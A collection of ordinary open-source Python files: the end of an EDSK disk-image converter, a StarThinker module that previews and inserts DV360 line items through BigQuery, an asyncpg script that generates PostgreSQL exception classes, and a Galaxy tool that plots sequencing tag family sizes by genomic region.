off += tsz
tszs = tszs[sides:]
in_dat = in_dat[off:]
else:
print("Not a valid EDSK image")
return
with open(argv[2], "wb") as f:
f.write(out)
if __name__ == "__main__":
main(sys.argv)
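# Illustrative note (added): double-stepping writes each source cylinder twice, so
# source cylinder 0 becomes image cylinders 0 and 1, cylinder 1 becomes 2 and 3, and
# so on, with the cylinder byte at offset 0x10 of every copied Track-Info block
# patched to the new cylinder number. Example invocation (file names are assumed):
#   python edsk_double_step.py game_40cyl.dsk game_80cyl.dsk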
|
starthinker/task/cm_to_dv/preview_li.py
|
arbrown/starthinker
| 138 |
88019
|
<filename>starthinker/task/cm_to_dv/preview_li.py
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
from starthinker.util.bigquery import query_to_view
from starthinker.util.data import get_rows
from starthinker.util.data import put_rows
from starthinker.util.google_api import API_DV360
from starthinker.util.sheets import sheets_clear
from starthinker.task.cm_to_dv.log import log_write
def preview_li_clear(config, task):
sheets_clear(
task['auth_sheets'],
task['sheet'],
'LI Preview',
'A2:AJ'
)
def preview_li_load(config, task):
preview_li_clear(config, task)
# download LI Rules
put_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table": "SHEET_LI_Rules",
"schema": [
{ "name": "CM_Campaign", "type": "STRING" },
{ "name": "DV_Campaign", "type": "STRING" },
{ "name": "Type", "type": "STRING" },
{ "name": "Budget_Allocation", "type": "STRING" },
{ "name": "Pacing_Type", "type": "STRING" },
{ "name": "Pacing_Period", "type": "STRING" },
{ "name": "Pacing_Period_Max_Spend", "type": "INTEGER" },
{ "name": "Pacing_Period_Max_Impressions", "type": "INTEGER" },
{ "name": "Frequency_Cap_Unlimited", "type": "BOOLEAN" },
{ "name": "Frequency_Cap_Time_Unit", "type": "STRING" },
{ "name": "Frequency_Cap_Time_Unit_Count", "type": "INTEGER" },
{ "name": "Frequency_Cap_Max_Impressions", "type": "INTEGER" },
{ "name": "Post_View_Count_Percent", "type": "INTEGER" },
{ "name": "Performance_Goal_Type", "type": "STRING" },
{ "name": "Performance_Goal_Amount", "type": "INTEGER" },
{ "name": "Max_Average_CPM_Amount", "type": "INTEGER" },
{ "name": "Custom_Bidding_Algorithm", "type": "STRING" },
],
"format": "CSV"
}},
get_rows(
task["auth_sheets"],
{ "sheets": {
"sheet": task["sheet"],
"tab": "LI Rules",
"header":False,
"range": "A2:AQ"
}}
)
)
# create LI preview ( main logic )
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"PREVIEW_LI",
"""WITH
cm AS (
SELECT
CM_P.name,
CM_P.advertiserId,
CM_C.id AS campaignId,
CM_C.name AS campaignName,
CM_P.compatibility,
CM_PG.pricingSchedule.startDate AS budgetSegmentStartDate,
CM_PG.pricingSchedule.endDate AS budgetSegmentEndDate,
NULLIF(CAST(CM_PP.rateOrCostNanos / 1000000000 AS INT64), 0) AS bidAmount,
CM_PG.name AS ioDisplayName,
CM_P.name AS liDisplayName
FROM `{dataset}.CM_PlacementGroups` AS CM_PG, UNNEST(childPlacementIds) AS childPlacementId, UNNEST(CM_PG.pricingSchedule.pricingPeriods) AS CM_PP
JOIN `{dataset}.CM_Placements` CM_P
ON childPlacementId = CM_P.id
JOIN `{dataset}.CM_Campaigns` AS CM_C
ON CM_P.campaignId = CM_C.id
JOIN `{dataset}.CM_Sites` AS CM_S
ON CM_PG.siteId = CM_S.id AND CM_S.name = 'Google DBM'
WHERE
pg_ProductCode IS NOT NULL
AND p_ProductCode IS NOT NULL
),
sheet AS (
SELECT
CONCAT(dv_a.displayName, ' - ', dv_a.advertiserid) AS DV_Advertiser,
sheet.*
FROM `{dataset}.SHEET_LI_Rules` as sheet
LEFT JOIN `{dataset}.DV_Campaigns` AS dv_c
ON CAST(REGEXP_EXTRACT(sheet.DV_Campaign, r' - (\d+)$') AS INT64) = dv_c.campaignId
LEFT JOIN `{dataset}.DV_Advertisers` AS dv_a
ON dv_a.advertiserid=dv_c.advertiserId
),
li_flattened AS (
SELECT
lineItemId,
displayName,
MAX(postViewLookbackWindowDays) AS postViewLookbackWindowDays,
MAX(postClickLookbackWindowDays) AS postClickLookbackWindowDays,
ARRAY_TO_STRING(ARRAY_AGG(CAST(floodlightActivityConfig.floodlightActivityId AS STRING) IGNORE NULLS), ",") AS floodlightActivityIds,
ARRAY_TO_STRING(ARRAY_AGG(CAST(inventorySourceId AS STRING) IGNORE NULLS), ",") AS inventorySourceIds
FROM `{dataset}.DV_LineItems`
LEFT JOIN UNNEST(conversionCounting.floodlightActivityConfigs) AS floodlightActivityConfig
LEFT JOIN UNNEST(inventorySourceIds) AS inventorySourceId
GROUP BY 1,2
),
io_flattened AS (
SELECT
insertionOrderId,
displayName,
MIN(DATE(segments.dateRange.startDate.year, segments.dateRange.startDate.month, segments.dateRange.startDate.day)) AS budgetSegmentStartDate,
        MAX(DATE(segments.dateRange.endDate.year, segments.dateRange.endDate.month, segments.dateRange.endDate.day)) AS budgetSegmentEndDate,
FROM `{dataset}.DV_InsertionOrders`
LEFT JOIN UNNEST(budget.budgetSegments) AS segments
GROUP BY 1,2
)
SELECT
'PREVIEW' AS action,
sheet.DV_Advertiser,
sheet.DV_Campaign,
CONCAT(dv_io.displayName, ' - ', dv_io.insertionOrderId) as DV_InsertionOrder,
cm.liDisplayName AS displayName,
sheet.Type AS lineItemType,
'ENTITY_STATUS_DRAFT' AS entityStatus,
CAST(NULL AS INT64) AS bidAmount,
dv_io.budgetSegmentStartDate,
      dv_io.budgetSegmentEndDate,
sheet.Budget_Allocation AS lineItemBudgetAllocationType,
sheet.Pacing_Period AS pacingPeriod,
sheet.Pacing_Type AS pacingType,
sheet.Pacing_Period_Max_Spend AS dailyMaxMicros,
sheet.Pacing_Period_Max_Impressions AS dailyMaxImpressions,
sheet.Frequency_Cap_Unlimited AS frequencyCapUnlimited,
sheet.Frequency_Cap_Time_Unit AS frequencyCapTimeUnit,
sheet.Frequency_Cap_Time_Unit_Count AS frequencyCapTimeUnitCount,
sheet.Frequency_Cap_Max_Impressions AS frequencyCapMaxImpressions,
sheet.Post_View_Count_Percent AS postViewCountPercentageMillis,
90 AS postViewLookbackWindowDays,
90 AS postClickLookbackWindowDays,
sheet.Performance_Goal_Type AS biddingStrategyPerformanceGoalType,
sheet.Performance_Goal_Amount AS performanceGoalAmountMicros,
sheet.Max_Average_CPM_Amount AS maxAverageCpmBidAmountMicros,
sheet.Custom_Bidding_Algorithm,
dv_li.floodlightActivityIds,
dv_li.inventorySourceIds,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Cost_Type,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Invoice_Type,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Amount,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Cost_Type,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Invoice_Type,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Percent
FROM sheet
LEFT JOIN cm
ON CAST(REGEXP_EXTRACT(sheet.CM_Campaign, r' - (\d+)$') AS INT64) = cm.campaignId
AND (
(SPLIT(cm.name,'_')[OFFSET(0)] = 'VID' AND LOWER(SPLIT(sheet.Type , '_')[SAFE_OFFSET(3)]) = 'video')
OR (NOT SPLIT(cm.name, '_')[OFFSET(0)] = 'VID' AND LOWER(SPLIT(sheet.Type, '_')[SAFE_OFFSET(3)]) = 'display')
)
LEFT JOIN io_flattened dv_io
ON dv_io.displayName = cm.ioDisplayName
LEFT JOIN li_flattened dv_li
ON dv_li.displayName = cm.liDisplayName
""".format(**task),
legacy=False
)
# create audit view
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"AUDIT_LI",
"""WITH
/* Check if sheet values are set */
INPUT_ERRORS AS (
SELECT
'LI Rules' AS Operation,
'Missing Sheet input value.' AS Error,
'ERROR' AS Severity,
CAST(NULL AS STRING) AS DV_Advertiser,
DV_Campaign,
CAST(NULL AS STRING) AS DV_InsertionOrder,
CM_Campaign AS DV_LineItem
FROM `{dataset}.SHEET_LI_Rules`
WHERE
CM_Campaign IS NULL
OR DV_Campaign IS NULL
OR Type IS NULL
OR Budget_Allocation IS NULL
OR Pacing_Period IS NULL
OR Pacing_Type IS NULL
OR Pacing_Period_Max_Spend IS NULL
OR Pacing_Period_Max_Impressions IS NULL
OR Frequency_Cap_Unlimited IS NULL
OR Frequency_Cap_Time_Unit IS NULL
OR Frequency_Cap_Time_Unit_Count IS NULL
OR Frequency_Cap_Max_Impressions IS NULL
OR Post_View_Count_Percent IS NULL
OR Performance_Goal_Type IS NULL
OR Performance_Goal_Amount IS NULL
OR Max_Average_CPM_Amount IS NULL
OR Custom_Bidding_Algorithm IS NULL
),
/* Check if duplicate LI */
DUPLICATE_ERRORS AS (
SELECT
'LI Rules' AS Operation,
'Duplicate Line Item.' AS Error,
'WARNING' AS Severity,
DV_Advertiser,
DV_Campaign,
DV_InsertionOrder,
DV_R.displayName AS DV_LineItem
FROM
`{dataset}.PREVIEW_LI` AS DV_R
LEFT JOIN (
SELECT
advertiserId,
campaignId,
insertionOrderId,
displayName
FROM `{dataset}.DV_LineItems`
GROUP BY 1,2,3,4
) AS DV_LI
ON DV_R.displayName = DV_LI.displayName
AND CAST(REGEXP_EXTRACT(DV_R.DV_Campaign, r' - (\d+)$') AS INT64) = DV_LI.campaignId
AND CAST(REGEXP_EXTRACT(DV_R.DV_InsertionOrder, r' - (\d+)$') AS INT64) = DV_LI.insertionOrderId
)
SELECT * FROM INPUT_ERRORS
UNION ALL
SELECT * FROM DUPLICATE_ERRORS
""".format(**task),
legacy=False
)
# write io preview to sheet
put_rows(
task['auth_sheets'],
{ 'sheets': {
'sheet': task['sheet'],
'tab': 'LI Preview',
'header':False,
'range': 'A2'
}},
get_rows(
task['auth_bigquery'],
{ 'bigquery': {
'dataset': task['dataset'],
'query': """SELECT
A.Severity,
A.Error,
P.*
FROM `{dataset}.PREVIEW_LI` AS P
LEFT JOIN (
SELECT
DV_Advertiser,
DV_Campaign,
DV_InsertionOrder,
DV_LineItem,
CASE
WHEN 'ERROR' IN UNNEST(ARRAY_AGG(Severity)) THEN 'ERROR'
WHEN 'WARNING' IN UNNEST(ARRAY_AGG(Severity)) THEN 'WARNING'
ELSE 'OK'
END AS Severity,
ARRAY_TO_STRING(ARRAY_AGG(CONCAT(Severity, ': ', Error)), '\\n') AS Error,
FROM `{dataset}.AUDIT_LI`
GROUP BY 1,2,3,4
) AS A
ON P.DV_Advertiser=A.DV_Advertiser
AND P.DV_Campaign=A.DV_Campaign
AND P.DV_InsertionOrder=A.DV_InsertionOrder
AND P.displayName=A.DV_LineItem
""".format(**task),
}}
)
)
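# Illustrative note (added): preview_li_load round-trips through BigQuery -- the
# "LI Rules" tab is loaded into SHEET_LI_Rules, joined against the CM/DV tables to
# build the PREVIEW_LI view, audited for missing inputs and duplicates in AUDIT_LI,
# and the combined result is written back to the "LI Preview" tab of the same sheet.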
def preview_li_insert(config, task):
# download IO Inserts
put_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table": "SHEET_LI_Inserts",
"schema": [
{ "name": "status", "type": "STRING", "mode": "NULLABLE" },
{ "name": "error", "type": "STRING", "mode": "NULLABLE" },
{ "name": "action", "type": "STRING", "mode": "NULLABLE" },
{ "name": "advertiser", "type": "STRING", "mode": "NULLABLE" },
{ "name": "campaign", "type": "STRING", "mode": "NULLABLE" },
{ "name": "insertionOrder", "type": "STRING", "mode": "NULLABLE" },
{ "name": "displayName", "type": "STRING", "mode": "NULLABLE" },
{ "name": "lineItemType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "entityStatus", "type": "STRING", "mode": "NULLABLE" },
{ "name": "bidAmount", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "budgetSegmentStartDate", "type": "DATE", "mode": "NULLABLE" },
{ "name": "budgetSegmentEndDate", "type": "DATE", "mode": "NULLABLE" },
{ "name": "lineItemBudgetAllocationType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "pacingPeriod", "type": "STRING", "mode": "NULLABLE" },
{ "name": "pacingType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "dailyMaxMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "dailyMaxImpressions", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "frequencyCapUnlimited", "type": "BOOLEAN", "mode": "NULLABLE" },
{ "name": "frequencyCapTimeUnit", "type": "STRING", "mode": "NULLABLE" },
{ "name": "frequencyCapTimeUnitCount", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "frequencyCapMaxImpressions", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postViewCountPercentageMillis", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postViewLookbackWindowDays", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postClickLookbackWindowDays", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "biddingStrategyPerformanceGoalType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "performanceGoalAmountMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "maxAverageCpmBidAmountMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "customBiddingAlgorithm", "type": "STRING", "mode": "NULLABLE" },
{ "name": "floodlightActivityIds", "type": "STRING", "mode": "NULLABLE" },
{ "name": "inventorySourceIds", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeCostType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeInvoiceType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeAmount", "type": "FLOAT", "mode": "NULLABLE" },
{ "name": "partnerMediaFeeCostType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerMediaFeeInvoiceType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerMediaFeePercent", "type": "FLOAT", "mode": "NULLABLE" },
],
"format": "CSV"
}},
get_rows(
task["auth_sheets"],
{ "sheets": {
"sheet": task["sheet"],
"tab": "LI Preview",
"header":False,
"range": "A2:AJ"
}}
)
)
# create insert view
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"INSERT_LI",
"""
SELECT
REGEXP_EXTRACT(advertiser, r' - (\d+)$') AS advertiserId,
STRUCT(
REGEXP_EXTRACT(advertiser, r' - (\d+)$') AS advertiserId,
REGEXP_EXTRACT(campaign, r' - (\d+)$') AS campaignId,
REGEXP_EXTRACT(insertionOrder, r' - (\d+)$') AS insertionOrderId,
displayName,
lineItemType,
entityStatus,
ARRAY((
SELECT partnerCost FROM (
SELECT
IF(partnerCPMFeeAmount IS NOT NULL,
STRUCT(
'PARTNER_COST_FEE_TYPE_CPM_FEE' AS feeType,
partnerCPMFeeCostType AS costType,
partnerCPMFeeInvoiceType AS invoiceType,
COALESCE(partnerCPMFeeAmount, 0) * 1000000 AS feeAmount
), NULL) AS partnerCost
UNION ALL
SELECT
IF(partnerMediaFeePercent IS NOT NULL,
STRUCT(
'PARTNER_COST_FEE_TYPE_MEDIA_FEE' AS feeType,
partnerMediaFeeCostType AS costType,
partnerMediaFeeInvoiceType AS invoiceType,
COALESCE(partnerMediaFeePercent, 0) * 1000 AS feePercentageMillis
), NULL) AS partnerCost
) WHERE partnerCost IS NOT NULL)
) AS partnerCosts,
STRUCT( 'LINE_ITEM_FLIGHT_DATE_TYPE_INHERITED' AS flightDateType ) AS flight,
STRUCT ( lineItemBudgetAllocationType AS budgetAllocationType ) AS budget,
STRUCT (
pacingPeriod,
pacingType,
IF(dailyMaxMicros IS NOT NULL, dailyMaxMicros * 1000000, NULL) AS dailyMaxMicros,
IF(dailyMaxMicros IS NULL, dailyMaxImpressions, NULL) AS dailyMaxImpressions
) AS pacing,
STRUCT ( CAST(frequencyCapUnlimited AS BOOL) AS unlimited,
frequencyCapTimeUnit AS timeUnit,
CAST(frequencyCapTimeUnitCount AS INT64) AS timeUnitCount,
CAST(frequencyCapMaxImpressions AS INT64) AS maxImpressions
) AS frequencyCap,
STRUCT ( 'PARTNER_REVENUE_MODEL_MARKUP_TYPE_TOTAL_MEDIA_COST_MARKUP' AS markupType ) AS partnerRevenueModel,
STRUCT ( STRUCT ( CAST(bidAmount * 1000000 AS INT64) AS bidAmountMicros ) AS fixedBid ) AS bidStrategy,
STRUCT(
postViewCountPercentageMillis AS postViewCountPercentageMillis,
ARRAY(
SELECT
STRUCT(
floodlightActivityId,
postClickLookbackWindowDays,
postViewLookbackWindowDays
)
FROM UNNEST(SPLIT(floodlightActivityIds)) AS floodlightActivityId
) AS floodlightActivityConfigs
) AS conversionCounting
) AS body
FROM `{dataset}.SHEET_LI_Inserts`
WHERE action = 'INSERT'
""".format(**task),
legacy=False
)
# write LIs to API
for row in get_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table":"INSERT_LI",
}},
as_object=True
):
try:
response = API_DV360(task['auth_dv']).advertisers().lineItems().create(**row).execute()
log_write('LI', row, response['lineItemId'], None)
except Exception as e:
log_write('LI', row, None, str(e))
log_write(config)
|
tools/generate_exceptions.py
|
baltitenger/asyncpg
| 5,714 |
88074
|
#!/usr/bin/env python3
#
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import argparse
import builtins
import re
import string
import textwrap
from asyncpg.exceptions import _base as apg_exc
_namemap = {
'08001': 'ClientCannotConnectError',
'08004': 'ConnectionRejectionError',
'08006': 'ConnectionFailureError',
'38002': 'ModifyingExternalRoutineSQLDataNotPermittedError',
'38003': 'ProhibitedExternalRoutineSQLStatementAttemptedError',
'38004': 'ReadingExternalRoutineSQLDataNotPermittedError',
'39004': 'NullValueInExternalRoutineNotAllowedError',
'42000': 'SyntaxOrAccessError',
'XX000': 'InternalServerError',
}
_subclassmap = {
# Special subclass of FeatureNotSupportedError
# raised by Postgres in RevalidateCachedQuery.
'0A000': ['InvalidCachedStatementError']
}
def _get_error_name(sqlstatename, msgtype, sqlstate):
if sqlstate in _namemap:
return _namemap[sqlstate]
parts = string.capwords(sqlstatename.replace('_', ' ')).split(' ')
if parts[-1] in {'Exception', 'Failure'}:
parts[-1] = 'Error'
if parts[-1] != 'Error' and msgtype != 'W':
parts.append('Error')
for i, part in enumerate(parts):
if part == 'Fdw':
parts[i] = 'FDW'
elif part == 'Io':
parts[i] = 'IO'
elif part == 'Plpgsql':
parts[i] = 'PLPGSQL'
elif part == 'Sql':
parts[i] = 'SQL'
errname = ''.join(parts)
if hasattr(builtins, errname):
errname = 'Postgres' + errname
return errname
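# Illustrative examples (added, not part of the original tool) of how the rules above
# derive class names; the inputs are assumed, not taken from a specific errcodes.txt:
#   _get_error_name('invalid_sql_statement_name', 'E', '26000')
#       -> 'InvalidSQLStatementNameError'   # capwords, 'Sql' -> 'SQL', 'Error' appended
#   _get_error_name('fdw_error', 'E', 'HV000')
#       -> 'FDWError'                       # already ends in 'Error'; 'Fdw' -> 'FDW'
#   _get_error_name('connection_exception', 'E', '08000')
#       -> 'PostgresConnectionError'        # 'Exception' -> 'Error', then prefixed
#                                           # because builtins.ConnectionError exists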
def main():
parser = argparse.ArgumentParser(
description='generate _exceptions.py from postgres/errcodes.txt')
parser.add_argument('errcodesfile', type=str,
help='path to errcodes.txt in PostgreSQL source')
args = parser.parse_args()
with open(args.errcodesfile, 'r') as errcodes_f:
errcodes = errcodes_f.read()
section_re = re.compile(r'^Section: .*')
tpl = """\
class {clsname}({base}):
{docstring}{sqlstate}"""
new_section = True
section_class = None
buf = '# GENERATED FROM postgresql/src/backend/utils/errcodes.txt\n' + \
'# DO NOT MODIFY, use tools/generate_exceptions.py to update\n\n' + \
'from ._base import * # NOQA\nfrom . import _base\n\n\n'
classes = []
clsnames = set()
def _add_class(clsname, base, sqlstate, docstring):
if sqlstate:
sqlstate = "sqlstate = '{}'".format(sqlstate)
else:
sqlstate = ''
txt = tpl.format(clsname=clsname, base=base, sqlstate=sqlstate,
docstring=docstring)
if not sqlstate and not docstring:
txt += 'pass'
if len(txt.splitlines()[0]) > 79:
txt = txt.replace('(', '(\n ', 1)
classes.append(txt)
clsnames.add(clsname)
for line in errcodes.splitlines():
if not line.strip() or line.startswith('#'):
continue
if section_re.match(line):
new_section = True
continue
parts = re.split(r'\s+', line)
if len(parts) < 4:
continue
sqlstate = parts[0]
msgtype = parts[1]
name = parts[3]
clsname = _get_error_name(name, msgtype, sqlstate)
if clsname in {'SuccessfulCompletionError'}:
continue
if clsname in clsnames:
raise ValueError(
'duplicate exception class name: {}'.format(clsname))
if new_section:
section_class = clsname
if clsname == 'PostgresWarning':
base = '_base.PostgresLogMessage, Warning'
else:
if msgtype == 'W':
base = 'PostgresWarning'
else:
base = '_base.PostgresError'
new_section = False
else:
base = section_class
existing = apg_exc.PostgresMessageMeta.get_message_class_for_sqlstate(
sqlstate)
if (existing and existing is not apg_exc.UnknownPostgresError and
existing.__doc__):
docstring = '"""{}"""\n\n '.format(existing.__doc__)
else:
docstring = ''
_add_class(clsname=clsname, base=base, sqlstate=sqlstate,
docstring=docstring)
subclasses = _subclassmap.get(sqlstate, [])
for subclass in subclasses:
existing = getattr(apg_exc, subclass, None)
if existing and existing.__doc__:
docstring = '"""{}"""\n\n '.format(existing.__doc__)
else:
docstring = ''
_add_class(clsname=subclass, base=clsname, sqlstate=None,
docstring=docstring)
buf += '\n\n\n'.join(classes)
_all = textwrap.wrap(', '.join('{!r}'.format(c) for c in sorted(clsnames)))
buf += '\n\n\n__all__ = (\n {}\n)'.format(
'\n '.join(_all))
buf += '\n\n__all__ += _base.__all__'
print(buf)
if __name__ == '__main__':
main()
|
tools/fsd/fsd_regions.py
|
ErasmusMC-Bioinformatics/tools-iuc
| 142 |
88078
|
#!/usr/bin/env python
# Family size distribution of tags which were aligned to the reference genome
#
# Author: <NAME> & <NAME>, Johannes-Kepler University Linz (Austria)
# Contact: <EMAIL>
#
# Takes at least one TABULAR file with tags before the alignment to the SSCS,
# a BAM file with tags of reads that overlap the regions of the reference genome and
# an optional BED file with chromosome, start and stop position of the regions as input.
# The program produces a plot which shows the distribution of family sizes of the tags from the input files and
# a tabular file with the data of the plot.
# USAGE: python FSD_regions.py --inputFile filenameSSCS --inputName1 filenameSSCS
# --bamFile DCSbamFile --rangesFile BEDfile --output_tabular outputfile_name_tabular
# --output_pdf outputfile_name_pdf
import argparse
import collections
import os.path
import re
import sys
import matplotlib.pyplot as plt
import numpy as np
import pysam
from matplotlib.backends.backend_pdf import PdfPages
plt.switch_backend('agg')
def readFileReferenceFree(file, delim):
with open(file, 'r') as dest_f:
data_array = np.genfromtxt(dest_f, skip_header=0, delimiter=delim, comments='#', dtype=str)
return data_array
def make_argparser():
parser = argparse.ArgumentParser(description='Family Size Distribution of tags which were aligned to regions of the reference genome')
parser.add_argument('--inputFile', help='Tabular File with three columns: ab or ba, tag and family size.')
parser.add_argument('--inputName1')
parser.add_argument('--bamFile', help='BAM file with aligned reads.')
parser.add_argument('--rangesFile', default=None, help='BED file with chromosome, start and stop positions.')
    parser.add_argument('--output_pdf', default="data.pdf", type=str, help='Name of the output pdf file.')
    parser.add_argument('--output_tabular', default="data.tabular", type=str, help='Name of the output tabular file.')
return parser
def compare_read_families_refGenome(argv):
parser = make_argparser()
args = parser.parse_args(argv[1:])
firstFile = args.inputFile
name1 = args.inputName1
name1 = name1.split(".tabular")[0]
bamFile = args.bamFile
rangesFile = args.rangesFile
title_file = args.output_pdf
title_file2 = args.output_tabular
sep = "\t"
with open(title_file2, "w") as output_file, PdfPages(title_file) as pdf:
data_array = readFileReferenceFree(firstFile, "\t")
bamIndex = f"{bamFile}.bai"
if not os.path.exists(bamIndex):
print(f"Info: Generating BAM index in {bamIndex}")
pysam.index(bamFile)
bam = pysam.AlignmentFile(bamFile, "rb")
qname_dict = collections.OrderedDict()
if rangesFile is not None:
with open(rangesFile, 'r') as regs:
range_array = np.genfromtxt(regs, skip_header=0, delimiter='\t', comments='#', dtype=str)
if range_array.ndim == 0:
print("Error: file has 0 lines")
exit(2)
if range_array.ndim == 1:
chrList = range_array[0]
start_posList = range_array[1].astype(int)
stop_posList = range_array[2].astype(int)
chrList = [chrList.tolist()]
start_posList = [start_posList.tolist()]
stop_posList = [stop_posList.tolist()]
else:
chrList = range_array[:, 0]
start_posList = range_array[:, 1].astype(int)
stop_posList = range_array[:, 2].astype(int)
if len(start_posList) != len(stop_posList):
print("start_positions and end_positions do not have the same length")
exit(3)
chrList = np.array(chrList)
start_posList = np.array(start_posList).astype(int)
stop_posList = np.array(stop_posList).astype(int)
for chr, start_pos, stop_pos in zip(chrList, start_posList, stop_posList):
chr_start_stop = "{}_{}_{}".format(chr, start_pos, stop_pos)
qname_dict[chr_start_stop] = []
for read in bam.fetch(chr, start_pos, stop_pos):
if not read.is_unmapped:
if re.search('_', read.query_name):
tags = re.split('_', read.query_name)[0]
else:
tags = read.query_name
qname_dict[chr_start_stop].append(tags)
else:
for read in bam.fetch():
if not read.is_unmapped:
if re.search(r'_', read.query_name):
tags = re.split('_', read.query_name)[0]
else:
tags = read.query_name
if read.reference_name not in qname_dict:
qname_dict[read.reference_name] = [tags]
else:
qname_dict[read.reference_name].append(tags)
seq = np.array(data_array[:, 1])
tags = np.array(data_array[:, 2])
quant = np.array(data_array[:, 0]).astype(int)
group = np.array(list(qname_dict.keys()))
all_ab = seq[np.where(tags == "ab")[0]]
all_ba = seq[np.where(tags == "ba")[0]]
quant_ab = quant[np.where(tags == "ab")[0]]
quant_ba = quant[np.where(tags == "ba")[0]]
seqDic_ab = dict(zip(all_ab, quant_ab))
seqDic_ba = dict(zip(all_ba, quant_ba))
lst_ab = []
lst_ba = []
quantAfterRegion = []
length_regions = 0
for i in group:
lst_ab_r = []
lst_ba_r = []
seq_mut = qname_dict[i]
if rangesFile is None:
seq_mut, seqMut_index = np.unique(np.array(seq_mut), return_index=True)
length_regions = length_regions + len(seq_mut) * 2
for r in seq_mut:
count_ab = seqDic_ab.get(r)
count_ba = seqDic_ba.get(r)
lst_ab_r.append(count_ab)
lst_ab.append(count_ab)
lst_ba_r.append(count_ba)
lst_ba.append(count_ba)
dataAB = np.array(lst_ab_r)
dataBA = np.array(lst_ba_r)
bigFamilies = np.where(dataAB > 20)[0]
dataAB[bigFamilies] = 22
bigFamilies = np.where(dataBA > 20)[0]
dataBA[bigFamilies] = 22
quantAll = np.concatenate((dataAB, dataBA))
quantAfterRegion.append(quantAll)
quant_ab = np.array(lst_ab)
quant_ba = np.array(lst_ba)
maximumX = np.amax(np.concatenate(quantAfterRegion))
minimumX = np.amin(np.concatenate(quantAfterRegion))
# PLOT
plt.rc('figure', figsize=(11.69, 8.27)) # A4 format
plt.rcParams['axes.facecolor'] = "E0E0E0" # grey background color
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
plt.rcParams['patch.edgecolor'] = "black"
fig = plt.figure()
plt.subplots_adjust(bottom=0.3)
colors = ["#6E6E6E", "#0431B4", "#5FB404", "#B40431", "#F4FA58", "#DF7401", "#81DAF5"]
col = []
for i in range(0, len(group)):
col.append(colors[i])
counts = plt.hist(quantAfterRegion, bins=range(minimumX, maximumX + 1), stacked=False, label=group,
align="left", alpha=1, color=col, edgecolor="black", linewidth=1)
ticks = np.arange(minimumX - 1, maximumX, 1)
ticks1 = [str(_) for _ in ticks]
ticks1[len(ticks1) - 1] = ">20"
plt.xticks(np.array(ticks), ticks1)
count = np.bincount([int(_) for _ in quant_ab]) # original counts
legend = "max. family size:\nabsolute frequency:\nrelative frequency:\n\ntotal nr. of reads:\n(before SSCS building)"
plt.text(0.15, 0.085, legend, size=11, transform=plt.gcf().transFigure)
legend = "AB\n{}\n{}\n{:.5f}\n\n{:,}".format(max(map(int, quant_ab)), count[len(count) - 1], float(count[len(count) - 1]) / sum(count), sum(np.array(data_array[:, 0]).astype(int)))
plt.text(0.35, 0.105, legend, size=11, transform=plt.gcf().transFigure)
count2 = np.bincount([int(_) for _ in quant_ba]) # original counts
legend = "BA\n{}\n{}\n{:.5f}" \
.format(max(map(int, quant_ba)), count2[len(count2) - 1], float(count2[len(count2) - 1]) / sum(count2))
plt.text(0.45, 0.1475, legend, size=11, transform=plt.gcf().transFigure)
plt.text(0.55, 0.2125, "total nr. of tags:", size=11, transform=plt.gcf().transFigure)
plt.text(0.8, 0.2125, "{:,} ({:,})".format(length_regions, length_regions / 2), size=11,
transform=plt.gcf().transFigure)
legend4 = "* In the plot, both family sizes of the ab and ba strands were used.\nWhereas the total numbers indicate only the single count of the tags per region.\n"
plt.text(0.1, 0.01, legend4, size=11, transform=plt.gcf().transFigure)
space = 0
        # use a distinct loop variable so the AB bincount kept in `count` is not
        # clobbered before it is written to the tabular output further below
        for i, region_count in zip(group, quantAfterRegion):
            plt.text(0.55, 0.15 - space, "{}:\n".format(i), size=11, transform=plt.gcf().transFigure)
            plt.text(0.8, 0.15 - space, "{:,}\n".format(len(region_count) / 2), size=11, transform=plt.gcf().transFigure)
space = space + 0.02
plt.legend(loc='upper right', fontsize=14, bbox_to_anchor=(0.9, 1), frameon=True)
plt.xlabel("Family size", fontsize=14)
plt.ylabel("Absolute Frequency", fontsize=14)
plt.grid(b=True, which="major", color="#424242", linestyle=":")
